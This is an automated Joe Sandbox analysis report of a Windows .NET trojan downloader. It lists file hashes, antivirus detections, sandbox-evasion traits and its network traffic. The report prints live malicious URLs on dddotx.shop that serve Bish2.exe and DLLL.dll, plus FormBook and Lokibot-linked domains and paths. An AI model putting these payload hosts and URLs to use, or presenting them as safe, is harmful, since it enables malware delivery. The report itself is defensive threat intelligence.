Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
AJ5zYYsisA.exe

Overview

General Information

Sample name:AJ5zYYsisA.exe
renamed because original name is a hash value
Original sample name:846b1a1780ef242a61828a428ce04a9d40c3a6bd02de90a3a06499895899fede.exe
Analysis ID:1588641
MD5:d522a48e0db195310ffe6dabf14d3c32
SHA1:83a4dfb28a5c9710ff812e7f568bf71316e33665
SHA256:846b1a1780ef242a61828a428ce04a9d40c3a6bd02de90a3a06499895899fede
Tags:exeuser-adrian__luca
Infos:

Detection

Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Machine Learning detection for sample
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains long sleeps (>= 3 min)
Enables debug privileges
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files

Classification

Process Tree

  • System is w10x64
  • AJ5zYYsisA.exe (PID: 2868 cmdline: "C:\Users\user\Desktop\AJ5zYYsisA.exe" MD5: D522A48E0DB195310FFE6DABF14D3C32)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

No Sigma rule has matched

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-01-11T03:35:00.622476+010020197142Potentially Bad Traffic192.168.2.749702188.114.96.3443TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus / Scanner detection for submitted sample
Source: AJ5zYYsisA.exeAvira: detected
Antivirus detection for URL or domain
Source: https://dddotx.shop/Bish2.exe:Avira URL Cloud: Label: malware
Source: https://dddotx.shop/DLLL.dllAvira URL Cloud: Label: malware
Source: https://dddotx.shop/DLLL.dll;https://dddotx.shop/Bish2.exeAvira URL Cloud: Label: malware
Source: https://dddotx.shopAvira URL Cloud: Label: malware
Source: http://dddotx.shopAvira URL Cloud: Label: malware
Source: https://dddotx.shop/Bish2.exeAvira URL Cloud: Label: malware
Multi AV Scanner detection for submitted file
Source: AJ5zYYsisA.exeReversingLabs: Detection: 57%
Source: AJ5zYYsisA.exeVirustotal: Detection: 70%Perma Link
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.3% probability
Machine Learning detection for sample
Source: AJ5zYYsisA.exeJoe Sandbox ML: detected
Source: AJ5zYYsisA.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49702 version: TLS 1.2
Source: AJ5zYYsisA.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: Bish.pdbH source: AJ5zYYsisA.exe
Source: Binary string: Bish.pdb source: AJ5zYYsisA.exe
Source: global trafficHTTP traffic detected: GET /Bish2.exe HTTP/1.1Host: dddotx.shopConnection: Keep-Alive
Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.7:49702 -> 188.114.96.3:443
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /Bish2.exe HTTP/1.1Host: dddotx.shopConnection: Keep-Alive
Source: global trafficDNS traffic detected: DNS query: dddotx.shop
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 02:35:00 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=14400CF-Cache-Status: EXPIREDReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fuz5G1IHvIYKa3ZvgJDCAj%2BnzwVGGXWy3wDAJdvzNR0QyoD21js1xoESBMYGdTz%2FV4b12D0Y2VKNUtl3yPMNaqx83Jihz4gqbGdMH%2FpqtvOxu6433MNQFqW4p7MEFQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 900182cf7a5a429a-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1870&min_rtt=1858&rtt_var=722&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2825&recv_bytes=684&delivery_rate=1489795&cwnd=237&unsent_bytes=0&cid=15301424f7eb13c0&ts=362&x=0"
Source: AJ5zYYsisA.exe, 00000000.00000002.1271434884.0000000000837000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micros
Source: AJ5zYYsisA.exe, 00000000.00000002.1272484683.00000000026E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://dddotx.shop
Source: AJ5zYYsisA.exe, 00000000.00000002.1272484683.00000000026E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://dddotx.shopd
Source: AJ5zYYsisA.exe, 00000000.00000002.1272484683.00000000026D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: AJ5zYYsisA.exe, 00000000.00000002.1272484683.00000000026D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dddotx.shop
Source: AJ5zYYsisA.exe, 00000000.00000002.1272484683.00000000026D2000.00000004.00000800.00020000.00000000.sdmp, AJ5zYYsisA.exe, 00000000.00000002.1272484683.0000000002671000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dddotx.shop/Bish2.exe
Source: AJ5zYYsisA.exe, 00000000.00000002.1272484683.0000000002709000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dddotx.shop/Bish2.exe:
Source: AJ5zYYsisA.exe, 00000000.00000002.1272484683.00000000026D2000.00000004.00000800.00020000.00000000.sdmp, AJ5zYYsisA.exe, 00000000.00000002.1272484683.0000000002671000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dddotx.shop/DLLL.dll
Source: AJ5zYYsisA.exeString found in binary or memory: https://dddotx.shop/DLLL.dll;https://dddotx.shop/Bish2.exe
Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49702 version: TLS 1.2
Source: AJ5zYYsisA.exe, 00000000.00000002.1271434884.000000000079E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs AJ5zYYsisA.exe
Source: AJ5zYYsisA.exe, 00000000.00000000.1260807942.000000000028A000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameBish.exe* vs AJ5zYYsisA.exe
Source: AJ5zYYsisA.exeBinary or memory string: OriginalFilenameBish.exe* vs AJ5zYYsisA.exe
Source: AJ5zYYsisA.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: classification engineClassification label: mal72.winEXE@1/1@1/1
Source: C:\Users\user\Desktop\AJ5zYYsisA.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\AJ5zYYsisA.exe.logJump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exeMutant created: NULL
Source: AJ5zYYsisA.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: AJ5zYYsisA.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\AJ5zYYsisA.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: AJ5zYYsisA.exeReversingLabs: Detection: 57%
Source: AJ5zYYsisA.exeVirustotal: Detection: 70%
Source: C:\Users\user\Desktop\AJ5zYYsisA.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exeSection loaded: rasman.dllJump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exeSection loaded: schannel.dllJump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exeSection loaded: gpapi.dllJump to behavior
Source: AJ5zYYsisA.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: AJ5zYYsisA.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: AJ5zYYsisA.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: Bish.pdbH source: AJ5zYYsisA.exe
Source: Binary string: Bish.pdb source: AJ5zYYsisA.exe
Source: AJ5zYYsisA.exeStatic PE information: 0xEF72C5EC [Sat Apr 20 06:06:36 2097 UTC]
Source: C:\Users\user\Desktop\AJ5zYYsisA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exeMemory allocated: 8E0000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exeMemory allocated: 2670000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exeMemory allocated: 2460000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exe TID: 4732Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exe TID: 5104Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: AJ5zYYsisA.exe, 00000000.00000002.1271434884.00000000007D7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllp
Source: C:\Users\user\Desktop\AJ5zYYsisA.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exeMemory allocated: page read and write | page guardJump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exeQueries volume information: C:\Users\user\Desktop\AJ5zYYsisA.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
DLL Side-Loading		1
DLL Side-Loading		1
Masquerading		OS Credential Dumping1
Security Software Discovery		Remote ServicesData from Local System1
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
Disable or Modify Tools		LSASS Memory31
Virtualization/Sandbox Evasion		Remote Desktop ProtocolData from Removable Media3
Non-Application Layer Protocol		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)31
Virtualization/Sandbox Evasion		Security Account Manager12
System Information Discovery		SMB/Windows Admin SharesData from Network Shared Drive4
Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Timestomp		NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Ingress Tool Transfer		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading		LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
AJ5zYYsisA.exe58%ReversingLabsByteCode-MSIL.Trojan.Leonem
AJ5zYYsisA.exe71%VirustotalBrowse
AJ5zYYsisA.exe100%AviraHEUR/AGEN.1323738
AJ5zYYsisA.exe100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://dddotx.shopd0%Avira URL Cloudsafe
https://dddotx.shop/Bish2.exe:100%Avira URL Cloudmalware
https://dddotx.shop/DLLL.dll100%Avira URL Cloudmalware
https://dddotx.shop/DLLL.dll;https://dddotx.shop/Bish2.exe100%Avira URL Cloudmalware
https://dddotx.shop100%Avira URL Cloudmalware
http://dddotx.shop100%Avira URL Cloudmalware
https://dddotx.shop/Bish2.exe100%Avira URL Cloudmalware

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
dddotx.shop
188.114.96.3
truefalse
    		unknown

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    https://dddotx.shop/Bish2.exefalse
    • Avira URL Cloud: malware
    		unknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    https://dddotx.shop/DLLL.dll;https://dddotx.shop/Bish2.exeAJ5zYYsisA.exefalse
    • Avira URL Cloud: malware
    		unknown
    https://dddotx.shopAJ5zYYsisA.exe, 00000000.00000002.1272484683.00000000026D2000.00000004.00000800.00020000.00000000.sdmpfalse
    • Avira URL Cloud: malware
    		unknown
    https://dddotx.shop/Bish2.exe:AJ5zYYsisA.exe, 00000000.00000002.1272484683.0000000002709000.00000004.00000800.00020000.00000000.sdmpfalse
    • Avira URL Cloud: malware
    		unknown
    http://dddotx.shopdAJ5zYYsisA.exe, 00000000.00000002.1272484683.00000000026E9000.00000004.00000800.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameAJ5zYYsisA.exe, 00000000.00000002.1272484683.00000000026D2000.00000004.00000800.00020000.00000000.sdmpfalse
      		high
      http://dddotx.shopAJ5zYYsisA.exe, 00000000.00000002.1272484683.00000000026E9000.00000004.00000800.00020000.00000000.sdmpfalse
      • Avira URL Cloud: malware
      		unknown
      https://dddotx.shop/DLLL.dllAJ5zYYsisA.exe, 00000000.00000002.1272484683.00000000026D2000.00000004.00000800.00020000.00000000.sdmp, AJ5zYYsisA.exe, 00000000.00000002.1272484683.0000000002671000.00000004.00000800.00020000.00000000.sdmpfalse
      • Avira URL Cloud: malware
      		unknown
      http://crl.microsAJ5zYYsisA.exe, 00000000.00000002.1271434884.0000000000837000.00000004.00000020.00020000.00000000.sdmpfalse
        		high

        World Map of Contacted IPs

        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs

        Public IPs

        IPDomainCountryFlagASNASN NameMalicious
        188.114.96.3
        		dddotx.shopEuropean Union
        		13335CLOUDFLARENETUSfalse

        General Information

        Joe Sandbox version:42.0.0 Malachite
        Analysis ID:1588641
        Start date and time:2025-01-11 03:34:04 +01:00
        Joe Sandbox product:CloudBasic
        Overall analysis duration:0h 4m 11s
        Hypervisor based Inspection enabled:false
        Report type:full
        Cookbook file name:default.jbs
        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
        Number of analysed new started processes analysed:12
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Sample name:AJ5zYYsisA.exe
        renamed because original name is a hash value
        Original Sample Name:846b1a1780ef242a61828a428ce04a9d40c3a6bd02de90a3a06499895899fede.exe
        Detection:MAL
        Classification:mal72.winEXE@1/1@1/1
        EGA Information:Failed
        HCA Information:
        • Successful, ratio: 100%
        • Number of executed functions: 9
        • Number of non-executed functions: 0
        Cookbook Comments:
        • Found application associated with file extension: .exe

        Warnings

        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
        • Excluded IPs from analysis (whitelisted): 13.107.246.45, 20.109.210.53
        • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
        • Execution Graph export aborted for target AJ5zYYsisA.exe, PID 2868 because it is empty
        • Not all processes where analyzed, report is missing behavior information
        • Report size getting too big, too many NtOpenKeyEx calls found.
        • Report size getting too big, too many NtQueryValueKey calls found.

        Simulations

        Behavior and APIs

        TimeTypeDescription
        21:34:59API Interceptor1x Sleep call for process: AJ5zYYsisA.exe modified

        Joe Sandbox View / Context

        IPs

        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        188.114.96.3AxKxwW9WGa.exeGet hashmaliciousFormBookBrowse
        • www.zkdamdjj.shop/kf1m/
        XeFYBYYj0w.exeGet hashmaliciousFormBookBrowse
        • www.einpisalpace.shop/8g74/?wtE0B=1LjxZz&9F=WJ/rFpSuW7SUTonvHlYgJHet70+40/nSG+S456FFT70GKpWTD+yYW7KPXc3l6inPZ41lXlQU44ttBNcSIyPO/Awb2QEZq+eieNEXwOjUfdTJHvICblirwfj54bAbpLWz76fPuJmn0JFO
        tfWjjV1LdT.exeGet hashmaliciousFormBookBrowse
        • www.zkdamdjj.shop/kf1m/
        M7XS5C07kV.exeGet hashmaliciousFormBookBrowse
        • www.zkdamdjj.shop/kf1m/
        https://cocteldedeas.mx/rx567#cmVjaWJhc2VAc2VhbWFyaXRpbWEuY29tGet hashmaliciousHTMLPhisherBrowse
        • cocteldedeas.mx/rx567/
        ofZiNLLKZU.exeGet hashmaliciousFormBookBrowse
        • www.zrichiod-riech.sbs/kf10/
        KcSzB2IpP5.exeGet hashmaliciousFormBookBrowse
        • www.cifasnc.info/9kxb/?SDC=3P5Gm1XciD5wQdS+7olugPzxqsRcbkm2h5Eq/rLsNh2+B342K587ak9zFSbTb4g5MvE40jzEqyGLe8su/vgeQxV3BBvpqLfi5EtkufMqD+H/d+eq3w==&mH=CpePy0P
        1162-201.exeGet hashmaliciousFormBookBrowse
        • www.einpisalpace.shop/pgw3/
        https://ik.imagekit.io/nrof2h909/Sherman%20Pruitt,%20Chief%20of%20Police,%20MSCJ.pdf?updatedAt=1736444487005Get hashmaliciousUnknownBrowse
        • jackoffjackofflilliilkillxoopoeadonline.top/drive/
        KSts9xW7qy.exeGet hashmaliciousFormBookBrowse
        • www.mydreamdeal.click/1ag2/?xP7x=4VB/N4F6tibqC9FQILosJ+n1llTK4MiF4YtEqiz3GsaSMOHPZtZI38ZqeQNXmBxLoc2gIm7YkXHcJ/CISLsxa/r9DhwgcU3z86+N04yu78wK1Du9wX32CCg=&F4=Q0yHy

        Domains

        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        dddotx.shoprQuotation.exeGet hashmaliciousLokibot, PureLog StealerBrowse
        • 172.67.153.63
        XE5p2qNoWt.exeGet hashmaliciousLokibot, PureLog Stealer, zgRATBrowse
        • 104.21.12.202
        6SQADa3zKv.exeGet hashmaliciousLokibot, PureLog Stealer, zgRATBrowse
        • 172.67.153.63
        Quotation.exeGet hashmaliciousLokibot, PureLog StealerBrowse
        • 104.21.12.202
        rPedidodecompra__PO20441__ARIMComponentes.exeGet hashmaliciousLokibot, PureLog Stealer, zgRATBrowse
        • 188.114.96.3
        1e#U0414.exeGet hashmaliciousLokibotBrowse
        • 188.114.96.3
        (PO403810)_VOLEX_doc.exeGet hashmaliciousLokibotBrowse
        • 188.114.97.3

        ASNs

        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        CLOUDFLARENETUSsuBpo1g13Q.exeGet hashmaliciousFormBookBrowse
        • 188.114.97.3
        4NG0guPiKA.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
        • 104.21.80.1
        n0nsAzvYNd.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
        • 104.21.80.1
        njVvgA8pEB.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
        • 104.21.16.1
        AxKxwW9WGa.exeGet hashmaliciousFormBookBrowse
        • 172.67.186.192
        k9OEsV37GE.exeGet hashmaliciousFormBookBrowse
        • 104.21.96.1
        rwlPT9YJt0.exeGet hashmaliciousSnake KeyloggerBrowse
        • 104.21.80.1
        YDg44STseR.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
        • 104.21.112.1
        ZoRLXzC5qF.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
        • 104.21.16.1
        XeFYBYYj0w.exeGet hashmaliciousFormBookBrowse
        • 188.114.96.3

        JA3 Fingerprints

        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        3b5074b1b5d032e5620f69f9f700ff0e4NG0guPiKA.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
        • 188.114.96.3
